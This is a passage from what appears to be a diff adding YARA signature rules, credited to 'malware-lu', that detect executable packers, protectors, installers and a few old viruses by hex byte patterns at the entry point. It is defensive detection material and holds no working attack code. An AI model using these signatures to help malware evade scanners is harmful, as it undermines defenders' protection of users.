+		$a0 = { 00 00 00 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 00 00 56 69 72 74 75 61 6C 46 72 65 65 00 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 45 78 69 74 50 72 6F 63 65 73 73 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 4D 65 73 73 61 67 65 42 6F 78 41 00 00 00 52 65 67 43 6C 6F 73 65 4B 65 79 00 00 00 53 79 73 46 72 65 65 53 74 72 69 6E 67 00 00 00 43 72 65 61 74 65 46 6F 6E 74 41 00 00 00 53 68 65 6C 6C 45 78 65 63 75 74 65 41 00 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule SPLayerv008
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 8D 40 00 B9 ?? ?? ?? ?? 6A ?? 58 C0 0C ?? ?? 48 ?? ?? 66 13 F0 91 3B D9 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule DxPackV086Dxd
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 8B FD 81 ED 06 10 40 00 2B BD 94 12 40 00 81 EF 06 00 00 00 83 BD 14 13 40 00 01 0F 84 2F 01 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FSGv110EngdulekxtMicrosoftVisualC60
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 03 DE EB 01 F8 B8 80 ?? 42 00 EB 02 CD 20 68 17 A0 B3 AB EB 01 E8 59 0F B6 DB 68 0B A1 B3 }
+	$a1 = { 03 DE EB 01 F8 B8 80 ?? 42 00 EB 02 CD 20 68 17 A0 B3 AB EB 01 E8 59 0F B6 DB 68 0B A1 B3 AB EB 02 CD 20 5E 80 CB AA 2B F1 EB 02 CD 20 43 0F BE 38 13 D6 80 C3 47 2B FE EB 01 F4 03 FE EB 02 4F 4E 81 EF 93 53 7C 3C 80 C3 29 81 F7 8A 8F 67 8B 80 C3 C7 2B FE }
+	$a2 = { 91 EB 02 CD 20 BF 50 BC 04 6F 91 BE D0 ?? ?? 6F EB 02 CD 20 2B F7 EB 02 F0 46 8D 1D F4 00 }
+	$a3 = { C1 CE 10 C1 F6 0F 68 00 ?? ?? 00 2B FA 5B 23 F9 8D 15 80 ?? ?? 00 E8 01 00 00 00 B6 5E 0B }
+	$a4 = { D1 E9 03 C0 68 80 ?? ?? 00 EB 02 CD 20 5E 40 BB F4 00 00 00 33 CA 2B C7 0F B6 16 EB 01 3E }
+	$a5 = { E8 01 00 00 00 0E 59 E8 01 00 00 00 58 58 BE 80 ?? ?? 00 EB 02 61 E9 68 F4 00 00 00 C1 C8 }
+	$a6 = { EB 01 4D 83 F6 4C 68 80 ?? ?? 00 EB 02 CD 20 5B EB 01 23 68 48 1C 2B 3A E8 02 00 00 00 38 }
+	$a7 = { EB 02 AB 35 EB 02 B5 C6 8D 05 80 ?? ?? 00 C1 C2 11 BE F4 00 00 00 F7 DB F7 DB 0F BE 38 E8 }
+	$a8 = { EB 02 CD 20 ?? CF ?? ?? 80 ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 }
+	$a9 = { F7 DB 80 EA BF B9 2F 40 67 BA EB 01 01 68 AF ?? ?? BA 80 EA 9D 58 C1 C2 09 2B C1 8B D7 68 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point or $a2 at pe.entry_point or $a3 at pe.entry_point or $a4 at pe.entry_point or $a5 at pe.entry_point or $a6 at pe.entry_point or $a7 at pe.entry_point or $a8 at pe.entry_point or $a9 at pe.entry_point
+}
+	
+	
+rule TPPpackclane
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 00 00 00 00 5D 81 ED F5 8F 40 00 60 33 ?? E8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FSGv110EngdulekxtMicrosoftVisualC6070
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 0B D0 8B DA E8 02 00 00 00 40 A0 5A EB 01 9D B8 80 ?? ?? 00 EB 02 CD 20 03 D3 8D 35 F4 00 00 00 EB 01 35 EB 01 88 80 CA 7C 80 F3 74 8B 38 EB 02 AC BA 03 DB E8 01 00 00 00 A5 5B C1 C2 0B 81 C7 DA 10 0A 4E EB 01 08 2B D1 83 EF 14 EB 02 CD 20 33 D3 83 EF 27 }
+	$a1 = { 0B D0 8B DA E8 02 00 00 00 40 A0 5A EB 01 9D B8 80 ?? ?? ?? EB 02 CD 20 03 D3 8D 35 F4 00 }
+	$a2 = { 87 FE E8 02 00 00 00 98 CC 5F BB 80 ?? ?? 00 EB 02 CD 20 68 F4 00 00 00 E8 01 00 00 00 E3 }
+	$a3 = { F7 D8 40 49 EB 02 E0 0A 8D 35 80 ?? ?? ?? 0F B6 C2 EB 01 9C 8D 1D F4 00 00 00 EB 01 3C 80 }
+	$a4 = { F7 DB 80 EA BF B9 2F 40 67 BA EB 01 01 68 AF ?? A7 BA 80 EA 9D 58 C1 C2 09 2B C1 8B D7 68 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point or $a2 at pe.entry_point or $a3 at pe.entry_point or $a4 at pe.entry_point
+}
+	
+	
+rule Thinstall24x25xJititSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC B8 ?? ?? ?? ?? BB ?? ?? ?? ?? 50 E8 00 00 00 00 58 2D ?? ?? ?? ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? BD ?? ?? ?? ?? 03 E8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule LocklessIntroPack
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 2C E8 ?? ?? ?? ?? 5D 8B C5 81 ED F6 73 ?? ?? 2B 85 ?? ?? ?? ?? 83 E8 06 89 85 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AHTeamEPProtector03faketElock061FEUERRADER
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 E9 00 00 00 00 60 E8 00 00 00 00 58 83 C0 08 F3 EB FF E0 83 C0 28 50 E8 00 00 00 00 5E B3 33 8D 46 0E 8D 76 31 28 18 F8 73 00 C3 8B FE B9 3C 02 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ExeStealth275aWebtoolMaster
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 58 53 68 61 72 65 77 61 72 65 2D 56 65 72 73 69 6F 6E 20 45 78 65 53 74 65 61 6C 74 68 2C 20 63 6F 6E 74 61 63 74 20 73 75 70 70 6F 72 74 40 77 65 62 74 6F 6F 6C 6D 61 73 74 65 72 2E 63 6F 6D 20 2D 20 77 77 77 2E 77 65 62 74 6F 6F 6C 6D 61 73 74 65 72 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEArmor046Hying
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 AA 00 00 00 2D ?? ?? 00 00 00 00 00 00 00 00 00 3D ?? ?? 00 2D ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4B ?? ?? 00 5C ?? ?? 00 6F ?? ?? 00 00 00 00 00 4B 45 52 4E 45 4C 33 32 2E 64 6C 6C 00 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 }
+	$a1 = { E8 AA 00 00 00 2D ?? ?? ?? 00 00 00 00 00 00 00 00 3D }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule eXPressorv13CGSoftLabs
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 45 78 50 72 2D 76 2E 31 2E 33 2E }
+	$a1 = { 55 8B EC 83 EC ?? 53 56 57 EB 0C 45 78 50 72 2D 76 2E 31 2E 33 2E 2E B8 ?? ?? ?? ?? 2B 05 ?? ?? ?? ?? A3 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? 00 74 13 A1 ?? ?? ?? ?? 03 05 ?? ?? ?? ?? 89 ?? ?? E9 ?? ?? 00 00 C7 05 }
+
+condition:
+		$a0 or $a1 at pe.entry_point
+}
+	
+	
+rule Upackv032BetaDwing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BE 88 01 ?? ?? AD 50 ?? ?? AD 91 F3 A5 }
+	$a1 = { BE 88 01 ?? ?? AD 50 ?? AD 91 ?? F3 A5 }
+
+condition:
+		$a0 or $a1
+}
+	
+	
+rule MSLRHV031emadicius
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 D1 CB 0F CA C1 CA E0 D1 CA 0F C8 EB 01 F1 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECompactv184
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PCGuardforWin32v500SofProBlagojeCeklic
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { FC 55 50 E8 00 00 00 00 5D 60 E8 03 00 00 00 83 EB 0E EB 01 0C 58 EB 01 35 40 EB 01 36 FF E0 0B 61 B8 ?? ?? ?? 00 EB 01 E3 60 E8 03 00 00 00 D2 EB 0B 58 EB 01 48 40 EB 01 35 FF E0 E7 61 2B E8 9C EB 01 D5 9D EB 01 0B 58 60 E8 03 00 00 00 83 EB 0E EB 01 0C }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule WiseInstallerStub
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 81 EC 78 05 00 00 53 56 BE 04 01 00 00 57 8D 85 94 FD FF FF 56 33 DB 50 53 FF 15 34 20 40 00 8D 85 94 FD FF FF 56 50 8D 85 94 FD FF FF 50 FF 15 30 20 40 00 8B 3D 2C 20 40 00 53 53 6A 03 53 6A 01 8D 85 94 FD FF FF 68 00 00 00 80 50 FF D7 83 F8 FF }
+	$a1 = { 55 8B EC 81 EC ?? 04 00 00 53 56 57 6A ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? 40 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 80 ?? 20 }
+	$a2 = { 55 8B EC 81 EC ?? ?? 00 00 53 56 57 6A 01 5E 6A 04 89 75 E8 FF 15 ?? 40 40 00 FF 15 ?? 40 40 00 8B F8 89 7D ?? 8A 07 3C 22 0F 85 ?? 00 00 00 8A 47 01 47 89 7D ?? 33 DB 3A C3 74 0D 3C 22 74 09 8A 47 01 47 89 7D ?? EB EF 80 3F 22 75 04 47 89 7D ?? 80 3F 20 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point or $a2
+}
+	
+	
+rule AnskyaNTPackerGeneratorAnskya
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 F0 53 B8 88 1D 00 10 E8 C7 FA FF FF 6A 0A 68 20 1E 00 10 A1 14 31 00 10 50 E8 71 FB FF FF 8B D8 85 DB 74 2F 53 A1 14 31 00 10 50 E8 97 FB FF FF 85 C0 74 1F 53 A1 14 31 00 10 50 E8 5F FB FF FF 85 C0 74 0F 50 E8 5D FB FF FF 85 C0 74 05 E8 70 FC FF FF 5B E8 F2 F6 FF FF 00 00 48 45 41 52 54 }
+
+condition:
+		$a0
+}
+	
+	
+rule ThinstallVirtualizationSuite30493080ThinstallCompany
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 68 53 74 41 6C 68 54 68 49 6E E8 00 00 00 00 58 BB 37 1F 00 00 2B C3 50 68 ?? ?? ?? ?? 68 00 2C 00 00 68 04 01 00 00 E8 BA FE FF FF E9 90 FF FF FF CC CC CC CC CC CC CC 55 8B EC 83 C4 F4 FC 53 57 56 8B 75 08 8B 7D 0C C7 45 FC 08 00 00 00 33 DB BA 00 }
+	$a1 = { 9C 60 68 53 74 41 6C 68 54 68 49 6E E8 00 00 00 00 58 BB 37 1F 00 00 2B C3 50 68 ?? ?? ?? ?? 68 00 2C 00 00 68 04 01 00 00 E8 BA FE FF FF E9 90 FF FF FF CC CC CC CC CC CC CC 55 8B EC 83 C4 F4 FC 53 57 56 8B 75 08 8B 7D 0C C7 45 FC 08 00 00 00 33 DB BA 00 00 00 80 43 33 C0 E8 19 01 00 00 73 0E 8B 4D F8 E8 27 01 00 00 02 45 F7 AA EB E9 E8 04 01 00 00 0F 82 96 00 00 00 E8 F9 00 00 00 73 5B B9 04 00 00 00 E8 05 01 00 00 48 74 DE 0F 89 C6 00 00 00 E8 DF 00 00 00 73 1B 55 BD 00 01 00 00 E8 DF 00 00 00 88 07 47 4D 75 F5 E8 C7 00 00 00 72 E9 5D EB }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule NsPack14byNorthStarLiuXingPing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 8B DF 83 3F 00 75 0A 83 C7 04 B9 00 00 00 00 EB 16 B9 01 00 00 00 03 3B 83 C3 04 83 3B 00 74 2D 01 13 8B 33 03 7B 04 57 51 52 53 }
+
+condition:
+		$a0
+}
+	
+	
+rule FSGv110EngbartxtWatcomCCEXE
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 02 CD 20 03 ?? 8D ?? 80 ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? EB 02 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AcidCrypt
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 B9 ?? ?? ?? 00 BA ?? ?? ?? 00 BE ?? ?? ?? 00 02 38 40 4E 75 FA 8B C2 8A 18 32 DF C0 CB }
+	$a1 = { BE ?? ?? ?? ?? 02 38 40 4E 75 FA 8B C2 8A 18 32 DF C0 CB }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule eXPressorv1451CGSoftLabs
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 EC 58 53 56 57 83 65 DC 00 F3 EB 0C 65 58 50 72 2D 76 2E 31 2E 34 2E 00 A1 00 ?? ?? ?? 05 00 ?? ?? ?? A3 08 ?? ?? ?? A1 08 ?? ?? ?? B9 81 ?? ?? ?? 2B 48 18 89 0D 0C ?? ?? ?? 83 3D 10 ?? ?? ?? 00 74 16 A1 08 ?? ?? ?? 8B 0D 0C ?? ?? ?? 03 48 14 }
+	$a1 = { 55 8B EC 83 EC 58 53 56 57 83 65 DC 00 F3 EB 0C 65 58 50 72 2D 76 2E 31 2E 34 2E 00 A1 00 ?? ?? ?? 05 00 ?? ?? ?? A3 08 ?? ?? ?? A1 08 ?? ?? ?? B9 81 ?? ?? ?? 2B 48 18 89 0D 0C ?? ?? ?? 83 3D 10 ?? ?? ?? 00 74 16 A1 08 ?? ?? ?? 8B 0D 0C ?? ?? ?? 03 48 14 89 4D CC }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule BeRoEXEPackerv100LZMABeRoFarbrausch
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? B9 04 00 00 00 8B F9 81 FE ?? ?? ?? ?? 7F 10 AC 47 04 18 2C 02 73 F0 29 3E 03 F1 03 F9 EB E8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PackanoidArkanoid
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BF 00 10 40 00 BE ?? ?? ?? 00 E8 9D 00 00 00 B8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule DAEMONProtectv067
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 60 9C 8C C9 32 C9 E3 0C 52 0F 01 4C 24 FE 5A 83 C2 0C 8B 1A 9D 61 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EmbedPEV100V124cyclotron
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 00 00 00 00 ?? ?? ?? ?? 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 4B 45 52 4E 45 4C 33 32 2E 64 6C 6C 00 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 00 00 00 00 00 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule VProtectorV10Avcasm
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 8A 8E 40 00 68 C6 8E 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 E8 03 00 00 00 C7 84 00 58 EB 01 E9 83 C0 07 50 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EncryptPE2200481022005314WFS
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 9C 64 FF 35 00 00 00 00 E8 7A }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner02JDPack1xJDProtect09Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 22 00 00 00 5D 8B D5 81 ED 90 90 90 90 2B 95 90 90 90 90 81 EA 06 90 90 90 89 95 90 90 90 90 83 BD 45 00 01 00 01 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EmbedPEV1Xcyclotron
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 83 EC 50 60 68 ?? ?? ?? ?? E8 ?? ?? 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EncryptPEV220070411WFS
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 9C 64 FF 35 00 00 00 00 E8 1B 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 47 65 74 54 65 6D 70 50 61 74 68 41 00 00 00 43 72 65 61 74 65 46 69 6C 65 41 00 00 00 43 72 65 61 74 65 46 69 6C 65 4D 61 70 70 69 6E 67 41 00 00 00 4D 61 70 56 69 65 77 4F 66 46 69 6C 65 00 00 00 55 6E 6D 61 70 56 69 65 77 4F 66 46 69 6C 65 00 00 00 43 6C 6F 73 65 48 61 6E 64 6C 65 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 45 78 69 74 50 72 6F 63 65 73 73 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01MicrosoftVisualBasic60DLLAnorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 5A 68 90 90 90 90 68 90 90 90 90 52 E9 90 90 FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NsPack14Liuxingping
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 E8 00 00 00 00 5D B8 ?? ?? 40 00 2D ?? ?? 40 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxTrivial46
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B4 4E B1 20 BA ?? ?? CD 21 BA ?? ?? B8 ?? 3D CD 21 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule STUDRC410JamieEditionScanTimeUnDetectablebyMarjinZ
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 68 2C 11 40 00 E8 F0 FF FF FF 00 00 00 00 00 00 30 00 00 00 38 00 00 00 00 00 00 00 37 BB 71 EC A4 E1 98 4C 9B FE 8F 0F FA 6A 07 F6 00 00 00 00 00 00 01 00 00 00 20 20 46 6F 72 20 73 74 75 64 00 20 54 6F 00 00 00 00 06 00 00 00 CC 1A 40 00 07 00 00 00 D4 18 40 00 07 00 00 00 7C 18 40 00 07 00 00 00 2C 18 40 00 07 00 00 00 E0 17 40 00 56 42 35 21 F0 1F 2A 00 00 00 00 00 00 00 00 00 00 00 00 00 7E 00 00 00 00 00 00 00 00 00 00 00 00 00 0A 00 09 04 00 00 00 00 00 00 E8 13 40 00 F4 13 40 00 00 F0 30 00 00 FF FF FF 08 00 00 00 01 00 00 00 00 00 00 00 E9 00 00 00 04 11 40 00 04 11 40 00 C8 10 40 00 78 00 00 00 7C 00 00 00 81 00 00 00 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 61 61 61 00 53 74 75 64 00 00 73 74 75 64 00 00 01 00 01 00 30 16 40 00 00 00 00 00 FF FF FF FF FF FF FF FF 00 00 00 00 B4 16 40 00 10 30 40 00 07 00 00 00 24 12 40 00 0E 00 20 00 00 00 00 00 1C 9E 21 00 EC 11 40 00 5C 10 40 00 E4 1A 40 00 2C 34 40 00 68 17 40 00 58 17 40 00 78 17 40 00 8C 17 40 00 8C 10 40 00 62 10 40 00 92 10 40 00 F8 1A 40 00 24 19 40 00 98 10 40 00 9E 10 40 00 77 04 18 FF 04 1C FF 05 00 00 24 01 00 0D 14 00 78 1C 40 00 48 21 40 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxSonikYouth
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 8A 16 02 00 8A 07 32 C2 88 07 43 FE C2 81 FB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule UPXShit006
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 ?? ?? 43 00 B9 15 00 00 00 80 34 08 ?? E2 FA E9 D6 FF FF FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SetupFactoryv6003SetupLauncher
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 90 61 40 00 68 70 3B 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 53 56 57 89 65 E8 FF 15 14 61 40 00 33 D2 8A D4 89 15 5C 89 40 00 8B C8 81 E1 FF 00 00 00 89 0D 58 89 40 00 C1 E1 08 03 CA 89 0D 54 89 40 00 C1 E8 10 A3 50 89 }
+
+condition:
+		$a0
+}
+	
+	
+rule CrypKeyV61XDLLCrypKeyCanadaInc
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 83 3D ?? ?? ?? ?? 00 75 34 68 ?? ?? ?? ?? E8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VcAsmProtectorVcAsm
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 E8 03 00 00 00 C7 84 00 58 EB 01 E9 83 C0 07 50 C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECompact2xxSlimLoaderBitSumTechnologies
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 ?? ?? ?? ?? 50 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 33 C0 89 08 50 45 43 32 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ENIGMAProtectorV11V12SukhovVladimir
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 83 ED 06 81 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule yodasProtectorv10bAshkbizDanehkar
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 53 56 57 60 E8 00 00 00 00 5D 81 ED 4C 32 40 00 E8 03 00 00 00 EB 01 ?? B9 EA 47 40 00 81 E9 E9 32 40 00 8B D5 81 C2 E9 32 40 00 8D 3A 8B F7 33 C0 E8 04 00 00 00 90 EB 01 ?? E8 03 00 00 00 EB 01 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEDiminisherv01
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 53 51 52 56 57 55 E8 00 00 00 00 5D 8B D5 81 ED A2 30 40 00 2B 95 91 33 40 00 81 EA 0B 00 00 00 89 95 9A 33 40 00 80 BD 99 33 40 00 00 74 }
+	$a1 = { 5D 8B D5 81 ED A2 30 40 ?? 2B 95 91 33 40 ?? 81 EA 0B ?? ?? ?? 89 95 9A 33 40 ?? 80 BD 99 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule SOFTWrapperforWin9xNTEvaluationVersion
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 00 00 00 00 5D 8B C5 2D ?? ?? ?? 00 50 81 ED 05 00 00 00 8B C5 2B 85 03 0F 00 00 89 85 03 0F 00 00 8B F0 03 B5 0B 0F 00 00 8B F8 03 BD 07 0F 00 00 83 7F 0C 00 74 2B 56 57 8B 7F 10 03 F8 8B 76 10 03 F0 83 3F 00 74 0C 8B 1E 89 1F 83 C6 04 83 C7 04 EB EF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillov200
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 00 02 41 00 68 C4 A0 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillov201
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 08 02 41 00 68 04 9A 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FreeJoinerSmallbuild014021024027GlOFF
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 ?? ?? FF FF 6A 00 E8 0D 00 00 00 CC FF 25 78 10 40 00 FF 25 7C 10 40 00 FF 25 80 10 40 00 FF 25 84 10 40 00 FF 25 88 10 40 00 FF 25 8C 10 40 00 FF 25 90 10 40 00 FF 25 94 10 40 00 FF 25 98 10 40 00 FF 25 9C 10 40 00 FF 25 A0 10 40 00 FF 25 A4 10 40 00 FF 25 AC 10 40 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SDProtector1xRandyLi
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 1D 32 13 05 68 88 88 88 08 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 58 64 A3 00 00 00 00 58 58 58 58 8B E8 E8 3B 00 00 00 E8 01 00 00 00 FF 58 05 53 00 00 00 51 8B 4C 24 10 89 81 B8 00 00 00 B8 55 01 00 00 89 41 20 33 C0 89 41 04 89 41 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NSISInstallerNullSoft
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 83 EC 20 53 55 56 33 DB 57 89 5C 24 18 C7 44 24 10 ?? ?? ?? ?? C6 44 24 14 20 FF 15 30 70 40 00 53 FF 15 80 72 40 00 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? BE }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEXv099
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 01 ?? ?? ?? ?? 83 C4 04 E8 01 ?? ?? ?? ?? 5D 81 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule IMPPacker10MahdiHezavehiIMPOSTER
+{
+      meta:
